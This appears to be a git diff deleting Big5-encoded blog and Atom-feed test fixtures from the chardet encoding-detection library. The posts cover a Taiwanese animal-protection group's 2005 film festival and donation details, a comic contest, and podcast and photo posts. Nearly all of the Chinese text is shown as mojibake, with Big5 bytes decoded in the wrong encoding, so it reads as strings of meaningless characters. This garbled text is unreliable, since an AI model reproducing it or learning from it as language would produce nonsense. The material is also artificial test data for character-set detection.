¡^¡A´¿ֵ‎§Aֵוִ±₪M₪U«[₪£¬O¥ֽ©ף¹qµר¼s§i¸ּ÷ס×o×o×÷×׳ץ¦׃¬O²׳¨ה₪@¥ֽ§N¦B¦B×÷¯U¯¶¥}ֵ¢¡A´¿¼ֵֹS¦­´ֱ¥xֶW¬y®צ°×«₪½¥¦¬®e©ׂ¦p₪H¶¡¦a÷»¡A´¿·םְY´־³­¥H½־½־µ½»₪µ״ִR¥ײ¯ף₪U×÷¦ו¸{´»ֵ¥H₪־¼ֵֹS₪Hֳ‏¹ן©ף¨­₪ְ¦a¦ל×÷µך÷a³g°‎¡A´¿¨ֿ§Aµo²{½ׁ¦h₪י±`¥־«~₪₪×÷÷µֱx¦¨₪ְ¨׃¦×ר¦~¥}¸T×÷¶ֲ÷µֵ‎₪Hֳ‏´׃÷©ג¨תֱx¥ִ¡A´¿ֲ½ִ¶¥Xש³\¦hµo₪H²`¬¨ֳ²`´I±׀¨|·N¸q×÷₪ו¥ף®ִׁy¡Aµ¥µ¥µ¥µ¥¡C¦¹¦¸¥D¿ל₪j«¬<a href="http://www.east.org.tw/animal-movie/index.htm" target="_blank">°×«¼v®i</a>₪´°ם«שֶ[²³§K¶O₪J³ץ¡A¨ֳ´ֱ«¨µ°j®ױ¶י®y½ֽ¿Eµo§ף¦h¨׃¦¦U÷״µר¨₪×÷°Q½׳¡C <br /> <br />°×«×ְ·|¬ד¨s·|©ֳׂצ₪×÷°«O₪£¶ָ¶ָ¬O¦b×ב¶י¸ּ÷N÷N¿©־ֱ‎ֱ‎ׯ½ׁµ¥½א₪®®¥״₪§¨ֶ¡A§ף¬OִYµֲ¦a¡B²׃½o¦a¡B¥‏­±¦a«ה¦ׂ₪Hֳ‏¹ן«°×«»Pְפ¹ׂ×÷­²z¡C¦p×G§Aֳצ₪₪Hֳ‏¡B«D₪H°×«¡Bְפ¹ִׂ³ֳD¡A½׀®½´°×«×ְ·|¬ד¨s·|¡A°×«×ְ·|¬ד¨s·|«ז»§A×÷ְ°§U¡A»Pµ½·N¡C <br /> <br /> <b>®½´ֳ§U₪ט¦¡¡G</b>¡@ <br /><ul> <br /><li> <br />₪@¡B¶l§½¹÷¼· <br /> <br />¹÷¼·±b¸¹¡G19461051 <br /> <br />₪ב¦W¡G¥xֶW°×«×ְ·|¬ד¨s·| <br /> <br />* ¶ס¼g¹÷¼·³ז®ֹ¡A½׀°O±o¯d₪U±z×÷ֱpµ¸¹q¸₪־¦a§}¡A₪~¯א±H¦¬¾µ¹±z®@¡I <br /> <br /><li> <br />₪G¡B»ָ¦זֲא±b <br /> <br />×ק¿ִ¾ק÷c¡G¥x¥_´I¨¹°׃·~»ָ¦ז¡]»ָ¦ז¥N½X¡G012 ) <br /> <br />₪ב¦W¡G¥xֶW°×«×ְ·|¬ד¨s·| <br /> <br />±b¸¹¡G431120600495 <br /> <br />* ¦p×G±z§Q¥־ATMֲא±b¡A½׀°ָ¥²Email©־¶ַ¯u§i¶D°×«×ְ·|¬ד¨s·|( ¼g«Hµ¹EAST ¶ַ¯u: (02) 2239-7634 ) <br /> <br />(1)±z×÷©m¦W <br /> <br />(2)ֱpµ¸¹q¸/¦a§}mailto:free0511@ms36.hinet.net?subject=ATM®½´ <br /> <br />(3)¶׳´₪י´ֱ <br /> <br />(4)ֲא±b±b¸¹ <br /> <br />¦p¦¹₪~¯א®ײ¹ן®½´₪H¡A¥H±Hµo¦¬¾µ¹±z¡I¦]ATMֲא±b¡A¥»·|¦s÷P₪W¥u§e²{₪@³s¦ך¼ֶ¦r¡AµL×k₪ְ¿כ¶׳´₪H¡A ©ׂ¥H½׀±z°ָ¥²×`·N¡I <br /> <br /><li>¡@¡@ <br />₪T¡B½u₪W«H¥־¥d®½´ <br /> <br /><a href="http://freepay.com.tw/c_shop.php?m_no=340" target="_blank">½u₪W®½´ (On-Line Donation)</a> url: http://freepay.com.tw/c_shop.php?m_no=340 <br /> <br />½׀®½´×ּ×`·N¡G1.±z×÷¦a§}ִז¦ל°ָ¥²¶ס¼g¡A¥H«K°×«×ְ·|¬ד¨s·|±Hµo·Pֱֲ¨חµ¹±z¡C <br />¡@¡@¡@¡@¡@¡@¡@2.µo²¼ִז¦ל₪־²־₪@½s¸¹ִז¦ל¬ׂ₪£¥²¶ס¼g¡A¦]¥»·|¬°«Dְח§Q₪§×ְ·|¹־ֵי¡C <br /> <br /><b>₪p ¥mְ{¡G</b> <br />¨ּ©ׂ±oµ|×k²ִ₪Q₪C±ר²ִ₪@¶µ²ִ₪G´¡A®½´ֱ`ֳB¦b÷מ¦X©ׂ±oֱ`ֳB¦₪ְ₪§₪G₪Q¥H₪÷¥i¥H¦Cֱ|¦©°£¡A¥i¥H¸`µ|³ב¡I <br /> <br /><li>¥xֶW°×«×ְ·|¬ד¨s·|÷פ¯¸: <a href="http://www.east.org.tw/index.htm" target="_blank">http://www.east.org.tw/index.htm</a> <br /> <br /></ul> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=214 - isis - 2005-09-29T01:18:05+07:00 - 0 - - - ¡C2005 °×«¼v®i - ¸װ²׃°T®§°ׁ¨£<a href="http://www.east.org.tw/animal-movie/index.htm" target="_blank">¼v®i¥D­¶</a>¡C <br /><ul> <br /><li> <br /><a href="http://www.east.org.tw/animal-movie/play-info-2.htm" target="_blank">³ץ¦¸₪־®ֹ¶¡×ם</a>¡C <br /><li> <br /><a href="http://www.east.org.tw/animal-movie/play-info-3.htm" target="_blank">¯ֱ²¼₪ט¦¡₪־ֶ[¼v³W«h</a>¡C[more...]<li> <br />¼v₪ש₪¶²׀ <br /></ul> <br /><table width="80%" border="0" cellpadding="5" cellspacing="1" bgcolor="#666666"> <br /> <tr bgcolor="#FFFFFF"> <br /> <td colspan="2" bgcolor="#D8E8EF" class="15bk"><strong>¥D₪ש¡G10³¡</strong></td> <br /> <td colspan="2" bgcolor="#EAEAEA" class="15bk"><strong>°ֶ₪ש¡G11³¡</strong></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td width="5%" bgcolor="#D8E8EF">1.</td> <br /> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-1.htm">₪ׁ°ף¨×₪l₪(´¶¹M¯ֵ)</a></td> <br /> <td width="5%" bgcolor="#EAEAEA">1.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-11.htm">§ג×בִmµ¹×¯(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">2.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-2.htm">¥d©װ¬O±רׯ(´¶¹M¯ֵ)</a></td> <br /> <br /> <td bgcolor="#EAEAEA">2.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-12.htm">©ס₪U´»ֵ×÷·O´d©µ´°׃·~₪ֶ©ס¥ֽ <br /> <br /> (´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">3.</td> <br /> <td bgcolor="#FFFFFF"><span class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-3.htm">¥ײ₪W¯ף(­­¨מ¯ֵ)</a></span></td> <br /> <br /> <td bgcolor="#EAEAEA">3.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-13.htm">©ס¥ֽ³¾®·§ל¶R½ז¯u¬(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">4.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-4.htm">¥רֳZִ_¨©(´¶¹M¯ֵ) <br /> <br /> </a></td> <br /> <td bgcolor="#EAEAEA">4.</td> <br /> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-14.htm">«B×Lµ´ֵT(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">5.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-5.htm">§×÷₪p₪»Pֱ`²־(´¶¹M¯ֵ) <br /> <br /> </a></td> <br /> <td bgcolor="#EAEAEA">5.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-15.htm">­׳¸ֹ¥ֽ©R×÷¯ֽ»H(´¶¹M¯ֵ)</a></td> <br /> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">6.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-6.htm">§ץ²E¶§©רֲ־°O(´¶¹M¯ֵ)</a> </td> <br /> <td bgcolor="#EAEAEA">6.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-16.htm">±ז¦w¡A¥ֽ©R×÷ְt³~(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">7.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-7.htm">÷Gµ´₪H¾ָ×÷®ֹ©| ¨C¥ף¥ײ¯ף³£´»ֵ <br /> <br /> (­­¨מ¯ֵ) <br /> <br /> </a></td> <br /> <td bgcolor="#EAEAEA">7.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-17.htm">µ¦ְ­ֵ¼v(´¶¹M¯ֵ)</a></td> <br /> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">8.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-8.htm">¿ֳ₪ץֲ־₪§¬P(´¶¹M¯ֵ)</a></td> <br /> <td bgcolor="#EAEAEA">8.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-18.htm">¶ל½¦±H©~ֳֹ(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">9.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-9.htm">ְ±µU¦C¶ַ₪§¾װ×§»P©M¥­(´¶¹M¯ֵ)</a></td> <br /> <td bgcolor="#EAEAEA">9.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-19.htm">¹A³ץ°×«»P§­ּ(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF">10.</td> <br /> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-10.htm">ִPµ{₪d¸U¨½₪§¹ץ«ב×בµ¶(´¶¹M¯ֵ)</a></td> <br /> <td bgcolor="#EAEAEA">10.</td> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-20.htm">¿Pֳֵ×÷¬G¶m¡׀°¨¯×(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> <tr bgcolor="#FFFFFF" class="15bk"> <br /> <td bgcolor="#D8E8EF"> </td> <br /> <td bgcolor="#FFFFFF"> </td> <br /> <td bgcolor="#EAEAEA">11.</td> <br /> <br /> <td bgcolor="#FFFFFF" class="link15blue"><a href="http://www.east.org.tw/animal-movie/movie-21.htm">ֱת¬y¡B´H¬y(´¶¹M¯ֵ)</a></td> <br /> </tr> <br /> </table> <br /> <br /><b>¬M÷t₪י´ֱ¦aֲI</b> <br /><ul> <br /> <br /><li> <br />¥x¥_ <br />2005¦~10₪כ14₪י¦10₪כ21₪י <br />¦aֲI¡Gֱ`²־ְ¸°|AֶU <br />¦a§}¡G¥x¥_¥«₪₪¥¿°ֿ₪₪µ״¸פ₪@¬q59¸¹4¼׃ (»·×F¦³f®ַ.±¶¹B¦ט×ש¯¸2¸¹¥X₪f) <br />¹q¸¡G¡]02¡^2388-5576 <br /> <br /> <li> <br />¥x₪₪ <br />2005¦~11₪כ01₪י¦11₪כ03₪י <br />¦aֲI¡GְR©y₪j¾ַ¥ֽ÷Aְ]1F¡]´f₪TֶU¡^ <br />¦a§}¡G¥x₪₪¿₪¨F³ְֲם₪₪´ֿ¸פ200¸¹ <br />¹q¸¡G(04)2632-8001#17054 <br /> <br /> <li> <br />°×¶¯ <br />2005¦~11₪כ05₪י¦11₪כ12₪י¡׀°×¶¯¥«±׀®v·| <br />¦aֲI¡G°×¶¯¥«±׀®v·| <br />¦a§}¡G801°×¶¯¥««e×ק°ֿ₪₪¥¿¥|¸פ209¸¹5¼׃ <br />¹q¸¡G¡]07¡^215-5660 # 41~44 <br /> <br /></ul> - http://www.upsaid.com/isis/index.php?action=viewcom&id=213 - isis - 2005-09-29T01:03:27+07:00 - 0 - - - diff --git a/chardet/tests/Big5/willythecop.blogspot.com.xml b/chardet/tests/Big5/willythecop.blogspot.com.xml deleted file mode 100644 index 5783066..0000000 --- a/chardet/tests/Big5/willythecop.blogspot.com.xml +++ /dev/null @@ -1,224 +0,0 @@ - - - - - - -÷ֶ₪F¡I -³o¬O¶³¸ּ­·×÷³¡¸¨®ז¡A°ן₪F₪@¨ַ¡m¦Dִµ«ֲ§Q¡n¥|®ז÷©µe¡A₪]¶מ¾~₪F₪@¨ַ×­·×÷©ַ·P¨¥¡C - -tag:blogger.com,1999:blog-14181906 -2005-12-08T03:49:54Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Cloudywind - -2005-12-08T11:45:00+08:00 -2005-12-08T03:49:54Z -2005-12-08T03:48:00Z - -tag:blogger.com,1999:blog-14181906.post-113401368093160242 -The First "ComixJam 24hr" Competition -<a href="http://photos1.blogger.com/blogger/3341/489/1600/cdc_flyer_fronta_72dpi.0.jpg"><img style="cursor:pointer; cursor:hand;" src="http://photos1.blogger.com/blogger/3341/489/320/cdc_flyer_fronta_72dpi.0.jpg" border="0" alt="" /></a><br />The 1st "ComixJam 24hr" Competition will be held on 9 Dec 2005 at the NATIONAL LIBRARY (100 Victoria Street, beside Parco Bugis Junction & Bras Basah Complex)<br /><br />The contest will begin right on the dot on 9th Dec 10am and participants are to stay within the premise of the National Library for a full 24 hours (which is 9th Dec 10am ¡V 10th Dec 10am). The theme for the comic creation will only be released on the day of the contest itself. -false - - - - -Cloudywind - -2005-11-20T13:00:00+08:00 -2005-11-20T05:01:48Z -2005-11-20T05:01:48Z - -tag:blogger.com,1999:blog-14181906.post-113246290823628448 -¡m¦Dִµ«ֲ§Q¡n ¡­24 - -
    - - - -
    ¡§§A­ּ·ַ³ֶ¦n¡A¥i¥H¶}©l₪F¶¡H¡¨
    -
    -false -
    - - - -Cloudywind - -2005-11-20T12:57:00+08:00 -2005-11-20T04:58:49Z -2005-11-20T04:58:49Z - -tag:blogger.com,1999:blog-14181906.post-113246272947711865 -¡m¦Dִµ«ֲ§Q¡n ¡­23 - -
    - - - -
    ¡§§­ּ×÷¼ִ¶₪´N¬O§A­ּ³o₪@²ױ¶¡H¡¨
    -
    -false -
    - - - -Cloudywind - -2005-11-19T00:49:00+08:00 -2005-11-18T16:51:28Z -2005-11-18T16:50:29Z - -tag:blogger.com,1999:blog-14181906.post-113233262979981867 -Cloudywind Podcast... Dawn Yang and the Rumours - -
    - - -
    ²{¦b´N¸ױֵ¥¡I
    -
    -
    -
    -
    ­q¾\ RSS - http://nineaugust.podomatic.com/rss2.xml -
    -
    Dawn Yang ¦b hottestblogger.com ₪W³Q¿ן¬°³ּ¨ֵw×ן₪k blogger¡Aֱ³Q®T¼ײ¸g¬צ₪½¥qֱ¬ש»¡­n±·¬ץ¦o¡C
    Bloggers ­ּ´N¶}©l¦b÷פ¸פ₪W´²¼½¦o×÷ֱֱ¨¥©Mֲֲ·׃₪ש¡K
    ¦o¨÷÷}«G×÷ֱy₪ױ©M©·P×÷¨­§ק¬O¯u×÷¶¡Hֱ¬O¾ד®e×÷µ²×G¡H
    ¦o¦bֱפֲֳµ₪°»ע¯u¬¶¡Hֱ¬O¨÷¨ַ³£¬O§O₪H₪₪¶ֻ¦o×÷ְֱ¨¥¡H
    -
    - -²ִ₪Q₪G¶°: Dawn Yang ©M¦o×÷ֱֱ¨¥ - -
    -
    -false -
    - - - -Cloudywind - -2005-11-17T08:40:00+08:00 -2005-11-17T00:45:15Z -2005-11-16T16:27:51Z - -tag:blogger.com,1999:blog-14181906.post-113215847116284413 -Cloudywind Podcast... An Unhappy Dr M - -
    - - -
    ²{¦b´N¸ױֵ¥¡I
    -
    -
    -
    -
    ­q¾\ RSS - http://nineaugust.podomatic.com/rss2.xml -
    -
    °¨ְ°«e¥פ₪j¨׀°¨·¹ן·sְ°×÷¨÷¨ַ³ֳ¥כ«₪£÷¡·N,ִ±±o¥L­ּ¶V¨׃¶V₪jֱx₪F¡I
    ³s¥L­n×÷ֵs¾פ₪]´±₪ֿ¹ן¡I
    ³s®₪פ²H₪ֶ¼t₪]´±°_¡I
    ³s½ה³ץ₪]´±°_¨ל¨ג­׃¨÷»ע¦h¡I
    -
    - -²ִ₪Q₪@¶°: °¨·¯u×÷¥ֽ®נ₪F¡I - -
    -
    -false -
    - - - -Cloudywind - -2005-11-12T11:56:00+08:00 -2005-11-12T03:58:10Z -2005-11-12T03:58:10Z - -tag:blogger.com,1999:blog-14181906.post-113176789052591151 -Cloudywind Podcast... Press Freedom is Nothing - -
    - - -
    ²{¦b´N¸ױֵ¥¡I
    -
    -
    -
    -
    ­q¾\ RSS - http://nineaugust.podomatic.com/rss2.xml -
    -
    ¦b Reporters without Borders 2005 ×÷ Worldwide Press Freedom Index ₪W¡A·s¥[©Y³÷µM±ֶ¦W²ִ140¡I
    ¦‎¬O¦b¥‏¥@¬ֹ³ּ₪£³g¦ֳ×÷°ך®a¸ּ§­ּ±ֶ²ִ5®@¡I
    ¦ט₪ט×÷₪H¥ֱ´N¦n¹³¶m₪U×÷©ס₪sֲ¨÷»ע¦¥ׁ¡A
    ¦׃¥»¦a×÷¥«¥ֱ₪]´N¹³¥»¦a¹A³ץ¾i×÷ֵ¢₪₪ֲ¡K
    -
    - -²ִ₪Q¶°: ³ר±i¨¥½׳¦¥ׁ¡H₪£­«­n¡I - -
    -
    -false -
    - - - -Cloudywind - -2005-11-09T00:49:00+08:00 -2005-11-08T17:23:20Z -2005-11-08T17:10:55Z - -tag:blogger.com,1999:blog-14181906.post-113146985569706751 -Cloudywind Podcast... How to cook TV shows - -
    - - -
    ²{¦b´N¸ױֵ¥¡I
    -
    -
    -
    -
    ­q¾\ RSS - http://nineaugust.podomatic.com/rss2.xml -
    -
    µN₪@¹D¦n×÷¹qµר¸`¥״»­n₪°»ע§ק®ֶ¡H
    ×£³sִע¼@°O±o­n¥־¬ץ₪@ֲI×÷¨k¥D¨₪©M₪k¥D¨₪
    ­n¥־÷C₪ץ×£³sִע¼@₪~¥i¥H×£¨ל₪@¦¶°
    µN¥»¦a®T¼ײ¸`¥״²¢«~®ֹ¬O₪£»­n¥[₪J÷q₪ג×÷
    -
    - -²ִ₪E¶°: «ח»עµN¥X₪@¹D¦n×÷¹qµר¸`¥״ - -
    -
    -false -
    - - - -Cloudywind - -2005-11-05T12:30:00+08:00 -2005-11-05T04:33:13Z -2005-11-05T04:33:13Z - -tag:blogger.com,1999:blog-14181906.post-113116519308876697 -Cloudywind Podcast... Please Help - -
    - - -
    ²{¦b´N¸ױֵ¥¡I
    -
    -
    -
    -
    ­q¾\ RSS - http://nineaugust.podomatic.com/rss2.xml -
    -
    ֱת°ך×÷°׃®a¨Dֱת°ך©M₪₪°ךְ°ְ°¦£¡A§O®i¶}₪°»ע×wµז₪j¾װ
    ֱp¦X°ך©Iֶ~¦U°ךְ°ְ°¦£¡A¦A®½ֲI¿ת±ֿ±ֿ₪°ע´µ©Z¦a¾_×÷20¸U­׃¨a¥ֱ
    ₪W¸U×÷¬°ך¥«¥ֱ¨«₪WµףְY§ִ³¡A§ֶ±זֱ`²־¥¬₪°¥i¥Hְ°ְ°¦£¡A§ײֳדֲ¾
    ¿D¬w°ך·|₪Lµf­n¨D·s¥[©Y¬F©²ְ°ְ°¦£¡A§O§P¦~»´×÷¿D¬w¬r¥ַ¦÷¦D
    -
    - -²ִ₪K¶°: ½׀ְ°ְ°¦£§a¡I - -
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/ytc.blogspot.com.xml b/chardet/tests/Big5/ytc.blogspot.com.xml deleted file mode 100644 index 63cbc36..0000000 --- a/chardet/tests/Big5/ytc.blogspot.com.xml +++ /dev/null @@ -1,308 +0,0 @@ - - - - - - - YUAN's Heterotopia -Utopia ¡C Heterotopia - -tag:blogger.com,1999:blog-6815444 -2005-11-30T15:46:37Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -YUANTZE - -2005-11-28T15:43:00+08:00 -2005-11-30T15:40:29Z -2005-11-28T07:47:12Z - -tag:blogger.com,1999:blog-6815444.post-113316403258204928 -Light Tracing -<iframe src="http://www.flickr.com/slideShow/index.gne?user_id=46243576@N00&tags=light" frameborder="0" width="500" scrolling="no" height="500"></iframe><br /><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.flickr.com/photos/yuantze/tags/light/" target="_blank">http://www.flickr.com/photos/yuantze/tags/light/</a><br /><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/100_0007.jpg"><img style="FLOAT: left; MARGIN: 0px 10px 10px 0px; WIDTH: 138px; CURSOR: hand; HEIGHT: 104px" height="120" alt="" src="http://photos1.blogger.com/blogger/2953/388/200/100_0007.jpg" width="164" border="0" /></a><br />±₪W÷־₪£µ÷N¶ֲ°_¨׃×±¬¾ק¡C<br /><br />¶ֲ·t₪₪¥ת×÷¬y°­y¸ס₪@×½¥O§µ°g¡C<br /><br />₪@ֳהֵ¥µMogwai¼ײ­µ₪₪×÷₪jֳz¬µ¡A¶ג...ֱ₪£¿א¡I<br /><span class="fullpost"><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/01.4.jpg"><img style="CURSOR: hand" height="245" alt="" src="http://photos1.blogger.com/blogger/2953/388/400/01.2.jpg" width="477" border="0" /></a><br /><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/02.1.jpg"><img style= CURSOR: hand; alt="" src="http://photos1.blogger.com/blogger/2953/388/1600/02.1.jpg" width="477" border="0" /></a></span> -false - - - - -YUANTZE - -2005-11-10T02:24:00+08:00 -2005-11-09T19:36:12Z -2005-11-09T18:25:02Z - -tag:blogger.com,1999:blog-6815444.post-113156070223128879 -¬y°×÷¾ַ®ױ¡B¬y°×÷¹q¸£¢w©s¥[©װ°ך×÷¬G¨ֶ -<a href="http://photos1.blogger.com/blogger/2953/388/1600/01.1.jpg"><img style="CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/400/01.jpg" border="0" /></a><br /><br />¦bֱp¦X·s»D÷פ×÷¾\ֵ×ְֳ₪וש₪W¬¨ל³o«h·s»D¢w <span style="color:#ffcc00;">¡m¬y°×÷¾ַ®ױ¡B¬y°×÷¹q¸£¢w©s¥[©װ°ך×÷¬G¨ֶ¡n</span>¡C<br />₪@¬¨ל¼׀ֳD´N²@₪£¦ׂ¼{×÷ֲI₪F₪U¥h¡A₪@¨׃¬O¦]¬°<span style="color:#ff6600;">"¬y°×÷¾ַ®ױ¡B¬y°×÷¹q¸£"</span>³o¨ַ<span style="color:#ff6600;">"¬y°×÷"</span>¦r²´¥O§¦n©_¡A₪G¨׃¬O¦]¬°¹ן§¨׃»¡¡A³o¼ֻ"©_¯S·s¼י"×÷×ֵ¶¡₪÷®e³÷µM·|¥X²{¦b©s¥[©װ¡H ¬₪F₪ו³¹₪§«ב₪~µoִ±§§ג¦o·Q¹³×÷₪׃¬ל§¡B₪׃¹₪¡A¨ֶ¹ך₪W×÷×ֵ¶¡¨ֳ«D§©ׂ·Q¹³×÷¨÷¼ֻ¡C<br /><span class="fullpost"><br />¦o¬O₪@­׃«<span style="color:#3366ff;">¹ך»¸ׁ¨M°ֳD×÷×ֵ¶¡</span>¡C³o­׃«D¬F©²×÷₪H¹D²ױֲ´<span style="color:#ff6600;">¡uShidhulai Swanirvar Sangstha¡v</span>¡A¦b₪T¦~«e´N¶}©l¥H₪Q´X¿´₪p²מ¡A¦b«B©u´ֱ¶¡¡A©µµNan-dakuja-Atrai-Boral ×e°ל¡A®i¶}₪G¦¥|₪Q₪½¨½×÷¨µ°j±׀¨|¡C₪@×½¨ל²{¦bֲX¼W¨ל₪­₪Q¿´²מִ~ִע×uµ×e¬°©s¥[©װ₪H¥ֱ×A°ָ¡C<br /><br />³o­׃®׳¨ׂ¹ן§­׃₪H¨׃»¡«D±`¦³½ל¡A¦o°£₪F¹ךֵי×ֵ¶¡₪W×÷¯u¥¿¬y°₪§¥~§ף²o¯A¨לµL§־×¾ֳׁ×÷¶ַ»¼¡B¬y°¡A»P₪@¯כ¦bµךְְ¼ֶ¦ל×ֵ¶¡©־×ּ¬O«״¿v§־¦¡₪W×÷¬y°«₪£¬¦P¡C³o¨ַ¬y°×÷±׀«ַ¡B¹ֿ®ְׁ]©M¹q¸£´Nµ«B©u¥ְֶ×÷×e¹D½¯©µ¦°¾»ק¶m§ר¡A¦׃²מ¡B×e³o¼ֻ×÷×ֵ¶¡·§©ְ§ף±j₪ֶ₪F¨÷÷״÷}¬y¡B÷©¹C×÷¯«¯µ(¸)©¡C­ל¥»³sµ¸°¾»ק¶m§ר×÷¹D¸פ¦]¬°«B©u¦׃³Q²T¨S¡A§ר¸¨¦]¦¹ֲ_µ´ֱpֳ´¡A¦‎¬O²מ×÷¥[₪J«oֵ‎₪פ×÷×‎¹jֵ¦¨₪Fֱpֳ´¡C©־³\²מ¡B×e¡B÷}¬y¡B÷©¹C¬O­׃₪H®צ÷©×÷·Q¹³¡A¦‎³o¼ֻ×÷·Q¹³«oֵ‎×ֵ¶¡¥ֽ°₪F°_¨׃¡C¥J²׃·Q·Q¡A³o­׃®׳¨ׂ₪₪¬y°×÷₪£¥u¬O¹ךֵי×÷²מ¡B×e¬y»P®נ­װ×÷¬y°¡Aֱ¦³₪£¦P¥@¬ֹ×÷×¾ֳׁ¡B×ְ·|»P¸gְ×÷¬y°¡C"²מ"×÷®צ÷©²£¥ֽ₪£¬O₪@´[±¡ִ@¦¡×÷¡A¦׃¬O¦]ְ³¹ך»×÷¦µMְפ¹ׂ©ׂ¨ֿµM¡A³o¬O₪@­׃«­«­n×÷ֳצֱהֲI¡C₪°»ע¬O®¥»×÷·½ְY¡H₪°»ע¬O¶¶¶ױ¦׃¥ֽ×÷µ²×G¡H<br /><br />₪ו₪₪´£¨ל¡A¸׃²ױֲ´×÷°ץ¦ז¥D÷Ab-dul Hasanat Mohammed Rezwan®M¥־¿p¨uְq¼w×÷¦W¨¥»¡¡G<span style="color:#ffcc00;">¡u°²¦p₪s₪£¨׃¡A§´N¥h´N₪s¡v</span>¡A¥L»¡¡G<span style="color:#ff6600;">¡u°²¦p¾ַ¥ֽ₪£¯א¨׃¨ל¾ַ®ױ¡A¨÷»ע¾ַ®ױ´Nְ³¸׃¨ל¥L­ּ¨÷¸ּ¥h¡I¡v</span>³o¬O³o­׃®׳₪l₪@₪ֱ×÷¶}©l¡A³o­׃¶}©l¨׃¦©ף¬Y¶µ°ם©w×÷«H©ְ¡C<br /><br />₪ו₪₪₪]´£¨ל¡G¥L­ּ×÷₪u§@¬O¦¨¥\×÷¡A²ִ₪@¡A¥L­ּ¨ֿ¥ז³q§xֳר¡B³q°T₪£«K¦a°ֿ×÷¥ֱ²³₪]¦³¨¨ל±׀¨|¡A±µ¦¬·s×¾×÷¾ק·|¡F²ִ₪G¡A©s¥[©װ¥_³¡°¾»·¦a°ֿ×÷¥ֱ²³¡A¥ֱ­·ֱ¬·ם«O¦u¡A³q±`₪£ֵ‎₪k¨א¨ל»·¦a¨D¾ַ©־ֵ‎°₪k¥X»·×ש¡A²{¦b¾ַ®ױ¦₪v¶]¨ל§ר¸¨¨׃₪F¡A°₪k¶}©l¥i¥H¨ל²מ₪W¾ַ²₪F¡C<br /><br />±q³o­׃®׳¨ׂ₪₪¡A§¬¨ל₪F×ֵ¶¡₪÷®e(§־¦¡)×÷²£¥ֽ·½¦©ף<span style="color:#ffcc00;">¦µMְפ¹ׂ×÷ְ³¹ן</span>¥H₪־®¥»<span style="color:#ffcc00;">×ְ·|°ֳD×÷¸ׁ¨M</span>¡A¦p×Gµw¬O­n»¡"¬y°"×÷®צ÷©¡A¨÷¥u¯א»¡¬O<span style="color:#ff6600;">×ֵ¶¡§־¦¨¡B¸ׁ¨M°ֳD«ב×÷¸אְִ»P´y­z</span>¡C<br /><br 